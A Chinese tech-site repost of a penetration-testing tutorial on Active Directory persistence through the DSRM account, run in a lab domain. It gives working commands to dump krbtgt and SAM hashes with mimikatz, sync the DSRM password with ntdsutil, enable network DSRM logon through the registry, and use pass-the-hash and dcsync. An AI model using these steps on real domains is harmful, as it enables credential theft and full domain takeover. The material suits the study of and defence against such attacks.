IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 开发工具 -> 域渗透|域权限维持之DSRM -> 正文阅读

[开发工具]域渗透|域权限维持之DSRM

作者: r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x00 前言

DSRM(Directory Services Restore Mode,目录服务恢复模式)是Windows域环境中域控制器的安全模式启动选项,但是只允许在控制台登陆,可以通过修改注册表的方式,来通过网络验证登陆到DC服务器上。
在每个域控制器都有一个本地管理员账户——也是DSRM账户,DSRM主要作用是使出现故障或崩溃的域环境恢复正常运行,修改DSRM密码的最基本方法是在DC上运行ntdsutil命令行工具。
此方法适用于Windows Server 2008及以上系统(2008需要安装补丁:KB961320)

0x01 本地测试

域名:god.com
域控服务器:Win-2008DC:10.10.10.30
域成员服务器:win-2008-1:10.10.10.10

1、使用mimikatz查看krbtgt账户的NTLM Hash

privilege::debug
lsadump::lsa /patch /name:krbtgt

//krbtgt hash
953eb0591ac152c17edfa514021c47f6

在这里插入图片描述

2、获取本地管理员的NTLM Hash

privilege::debug
token::elevate
lsadump::sam

afffeba176210fad4628f0524bfe1942

在这里插入图片描述

3、DSRM账号与krbtgt的NTLM Hash同步

NTDSUTIL
set dsrm password
sync from domain account krbtgt
q
q

在这里插入图片描述

4、查看DSRM的NTLM是否同步

lsadump::sam

在这里插入图片描述

5、修改DSRM登录方式

在注册表中新建:
HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior 项,值为2。

DSRM的三种登录方式:(推荐设置2的原因是在我设置1的时候出现error,因为没有重启ad,但是值为2是立即生效的,在Windows Server 2000以后的版本的操作系统中,对DSRM使用控制台登录域控制器进行了限制。如果要使用DSRM账号通过网络登录域控器,需要将该值设置为2)
0:默认值,只有当域控器重启并进入DSRM模式时,才可以使用DSRM管理员账号;
1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控制器;
2:在任何情况下都可以使用DSRM管理员账号登录域控器。

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 0 /f

//powershell
New-ItemProperty "HKLM\System\CurrentControlSet\Control\Lsa" -name "DsrmAdminLogonBehavior" -value 2 -propertyType DWORD

在这里插入图片描述

6、使用DSRM账号通过网络远程登录域控器

使用mimikatz进行哈希传递,在域成员机器的管理员模式打开mimikatz(NThash为krbtgt)

privilege::debug
sekurlsa::pth /domain:WIN-2008DC /user:Administrator /ntlm:953eb0591ac152c17edfa514021c47f6

/domain:域控的主机名
/user:本机管理员用户
/NTLM:krbtgt的hash

在这里插入图片描述

7、使用mimikatz远程转存储krbtgt的NTLM Hash

哈希传递完成后,会弹出一个命令行窗口,并在该窗口中打开mimikatz,输入如下命令:

privilege::debug
lsadump::dcsync /domain:god.com /dc:WIN-2008DC /user:krbtgt

/dimain 域名
/dc:域控主机名

在这里插入图片描述

0x03 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

  开发工具 最新文章
Postman接口测试之Mock快速入门
ASCII码空格替换查表_最全ASCII码对照表0-2
如何使用 ssh 建立 socks 代理
Typora配合PicGo阿里云图床配置
SoapUI、Jmeter、Postman三种接口测试工具的
github用相对路径显示图片_GitHub 中 readm
Windows编译g2o及其g2o viewer
解决jupyter notebook无法连接/ jupyter连接
Git恢复到之前版本
VScode常用快捷键
上一篇文章      下一篇文章      查看所有文章
加:2021-09-05 11:13:53  更:2021-09-05 11:15:22 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/23 0:28:58-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计